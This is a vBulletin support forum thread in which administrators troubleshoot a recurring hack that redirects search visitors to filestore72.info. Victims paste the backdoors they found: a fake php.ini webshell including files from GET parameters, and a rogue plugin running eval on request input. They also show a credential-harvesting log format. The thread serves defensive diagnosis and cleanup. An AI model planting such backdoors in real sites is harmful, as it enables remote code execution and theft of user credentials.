Announcement

Collapse
No announcement yet.

Vbulletin 4.2.0 pl3 hacked redirect to filestore72.info

Collapse
X
  • Filter
  • Time
  • Show
Clear All
new posts

  • Vbulletin 4.2.0 pl3 hacked redirect to filestore72.info

    My site has twice been hacked and redirect to http://filestore72.info/download.php?

    The script only redirect in the first time the browser have cleaned cache and temps, and only redirect by google search if go to the browser and enter the url manual the script dont redirect to the http://filestore72.info/download.php?

    My site:
    vBulletin 4.2.0 Patch Level 3
    Tabs en vBulletin 4.x 2.0.3
    Tapatalk 4.3.0
    vBSEO 3.6.0 pl2
    Fuzzy SEO Booster 3 1.5.0b_costum
    vBSEO :: Sitemap Generator 3.0
    VSa - Advanced Forum Statistics 7.1
    VSa - ChatBox 3.1.8
    VSa - Sub-Forum Manager 3.1.4


    After a quick search in the web i find another sites vbulletin with this problem.
    Go to google and enter this to search and then click in the first result site you will be redirect to another site"filestore72.info"

    Code:
    rapisalive.com faq
    Missing SOH data sim-outhouse
    sonicownersforum Iraqivet's build

    Any one have a clue where is the hole?

    - - - Updated - - -

    Wen i turn off the tapatalk plugin and active again the problem go away but after 24 hours same problem again.

  • Joe D.
    replied
    Yes, I would uninstall VBSEO

    VBSEO is down but luckily the uninstall instructions with the URL Rewrite rules so links don't break is still available in the "Way Back" machine - http://web.archive.org/web/201301221...all-vbseo-238/

    Leave a comment:


  • RichieBoy67
    replied
    I have done the best I can to make it secure but my advice would be to remove that old version. What do you think Joe? I always value your opinions.

    Thanks

    Leave a comment:


  • Joe D.
    replied
    There is no patch I have ever seen.

    Leave a comment:


  • RichieBoy67
    replied
    Hey guys, I am working on a client site with a similar issue and I believe it is tied to the use of Vbseo 3.6. He is using Vbulletin 4.2 but still has Vbseo 3.6 and seeing as Vbseo no longer exists he has no way to get the latest version. Is there a patch available to fix this without doing an upgrade?

    Thanks

    Leave a comment:


  • PET
    replied
    up.

    I deleted that PHP.INI.

    I aso found a new my.log file on the root.

    Leave a comment:


  • PET
    replied
    Ok I'm digging deeper.

    I just found a file called my.log in the root of the forum. It contains 2 users info ... like this:

    Code:
    Array
    (
        [userid] => 11582
        [usergroupid] => 25
        [membergroupids] =>
        [infractiongroupids] =>
        [username] => username here
        [password] => password here
        [salt] => salt code here
        [email] => email.address.here
    )
    Error log file is full of entries like this:

    Code:
    [Sun Nov 10 06:36:29 2013] [error] [client 178.151.216.90] (36)File name too long: access to /index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff; failed, referer: http://forum.censored.de/index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;
    [Sun Nov 10 06:37:26 2013] [error] [client 74.91.17.226] (36)File name too long: access to /index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+"bamilesqshuzea3914";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1;+Result:+chosen+nickname+"bjnessdark9685";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1; failed, referer: http://forum.censored/index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+%22bamilesqshuzea3914%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;+Result:+chosen+nickname+%22bjnessdark9685%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;
    I also have a php.ini file in my forum root that has this:

    Code:
    <?
    echo ini_get("safe_mode");
    echo ini_get("open_basedir");
    include($_GET["file"]);
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    echo ini_get("safe_mode");
    echo ini_get("open_basedir");
    include($_GET["ss"]);
    ?>

    Leave a comment:


  • Lynne
    replied
    Have you looked through your access_logs to see what is going on?

    Leave a comment:


  • PET
    replied
    1. They are ok. No one who should not have access, is getting access.
    2. We had one 3 months ago that we deleted, that one probably gained access trough some PHP Root files I found and deleted.
    4. I went to each of them disable them one by one.

    Filestore still comes back after 1-2 days. Really no idea what to do.

    vBulletin is running 4.2.1 (yes I know there is a 4.2.2)
    All old vB files got deleted. All extra PHP files got deleted.
    Fond some PHP Root files in Attachment folders all got deleted.
    I protected the 777 folders.
    Checked the template

    So no rogue admins, no root php files.

    Filestore still comes back.



    Thanks

    Leave a comment:


  • Mark.B
    replied
    Change your admin passwords.
    Check for any admins you don't recognise.
    Password protect your admincp folder using .htaccess
    Go through each plug in and delete any that you don't recognise.

    If you're still having problems after that, please start your own topic with full details of the problem.

    Leave a comment:


  • PET
    replied
    Ok my problem persists. Any ideas?

    I don't use vBSEO. I have disabled plugins one by one. The filestore hack always come back after 1-2 days.

    Leave a comment:


  • PET
    replied
    Ok. I'm also posting here. Same problem. Not vbSEO installed. Did everything from what's been suggested. The filestore problem still persists even after the upgrade.

    I'm looking into plugins and I see this:
    A Plugin Named: 123
    Product: vBulletin
    Hook Location: faq_complete

    This is the code:

    Code:
    eval(stripslashes($_REQUEST[ass]));
    No idea what this is so I just deactivated.


    Do you have any ideas on how to fix this? It keeps coming back.

    Leave a comment:


  • Joe D.
    replied
    Look at the links in Post # 3, and update VBSEO.

    To clear the current infection just go to the Admin CP -> Plugins & Products -> Product Manager and DISABLE then Re-Enable any product listed. This will force a refresh of the datastore which is where the code usually is.

    Leave a comment:


  • postcd
    replied
    Im having same issue

    Leave a comment:


  • EliasAlucard
    replied
    Originally posted by Zachery View Post
    Any third party addons can have exploits, we don't track those. And unless the addon developer gets a notification about them, they might not be fixed.
    But do all third party addons ALWAYS have exploits? I'm trying to pinpoint the plugins we have in common here, if the exploit is actually in the plugin

    Leave a comment:

Related Topics

Collapse

Working...
X